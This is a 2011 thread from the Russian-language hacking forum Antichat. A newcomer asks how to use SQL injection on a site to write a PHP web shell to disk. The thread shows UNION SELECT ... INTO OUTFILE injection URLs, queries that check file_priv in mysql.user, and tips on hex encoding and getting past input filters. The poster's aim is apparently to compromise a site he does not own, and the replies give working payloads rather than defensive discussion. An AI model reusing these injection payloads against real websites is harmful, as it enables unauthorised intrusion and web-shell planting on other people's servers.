ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.11.2011, 17:47
|
|
Новичок
Регистрация: 21.06.2009
Сообщений: 0
Провел на форуме:
10942
Репутация:
0
|
|
Ребят подскажите что делать вот например есть сайт доступ в базу есть хочу залить на сайт через это) и тут возникли 2 вопроса
1) как узнать есть ли у пользователя доступ на запись?
2) если узнаю пути как далее действовать?
это?
Код:
Code:
http://site.ru/cat.php?id=-1' UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php
и как потом залить фаил на шелл если все получится? |
|
|
14.11.2011, 18:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
36102
Репутация:
0
|
|
Сообщение от nikitos2401
nikitos2401 said:
Ребят подскажите что делать вот например есть сайт доступ в базу есть хочу залить на сайт через это) и тут возникли 2 вопроса
1) как узнать есть ли у пользователя доступ на запись?
2) если узнаю пути как далее действовать?
это?
Код:
Code:
http://site.ru/cat.php?id=-1' UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php
и как потом залить фаил на шелл если все получится?
Код:
Code:
http://site.ru/cat.php?id=-1' UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php
Лучше так.
И в 1.php?e=(строка зашифрованая в бэйс64)
А код
типа
|
|
|
|
14.11.2011, 18:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
28093
Репутация:
11
|
|
Сообщение от None
1) как узнать есть ли у пользователя доступ на запись?
Код:
Code:
http://site.ru/cat.php?id=-1' UNION SELECT 1,2,3,file_priv,5,6 from mysql.user where user='текущий юзер'+--+
|
|
|
|
14.11.2011, 20:39
|
|
Новичок
Регистрация: 21.06.2009
Сообщений: 0
Провел на форуме:
10942
Репутация:
0
|
|
Ребят не работает 99999+and+1=0+union+select+1,2,3,file_priv,5,6,7,8 ,9+from+mysql.user+where+user='user' но проходит ошибка и ничего не выводится)
|
|
|
|
15.11.2011, 00:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
'user' -- попробуй в Hex закодировать
|
|
|
|
15.11.2011, 00:39
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
1) Если на сервере сидит 2 и более юзеров, то запрос
99999+and+1=0+union+select+1,2,3,file_priv,5,6,7,8 ,9+from+mysql.user Если появиться Y то заливай шелл, если нет, то пока...
2) 1 юзер запрос 99999+and+1=0+union+select+1,2,3,file_priv,5,6,7,8 ,9+from+mysql.user+where+user='root'
|
|
|
|
15.11.2011, 01:03
|
|
Новичок
Регистрация: 21.06.2009
Сообщений: 0
Провел на форуме:
10942
Репутация:
0
|
|
в hex не помогло) а такая фигня почти на всех сайтах ничего не хочет показывать) ппц
|
|
|
|
15.11.2011, 01:10
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
Сообщение от nikitos2401
nikitos2401 said:
в hex не помогло) а такая фигня почти на всех сайтах ничего не хочет показывать) ппц
Нет не на всех. Значит где-то фильтруется запрос...скорее всего + или другой знак...но все таки можно залить шелл.
|
|
|
|
15.11.2011, 09:16
|
|
Новичок
Регистрация: 21.06.2009
Сообщений: 0
Провел на форуме:
10942
Репутация:
0
|
|
Сообщение от aydin-ka
aydin-ka said:
Нет не на всех. Значит где-то фильтруется запрос...скорее всего
+
или другой знак...но все таки можно залить шелл.
так а каким методом тогда его залить? ведь если фильтрация то запрос не пройдет) и следовательно не создастся файл
|
|
|
|
15.11.2011, 10:32
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
этот вопрос уже столько раз обсуждался на форуме, что тошно уже от него..твоя тема уже наверное тысячная, без линка никто тебе не скажет как залить шелл .
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
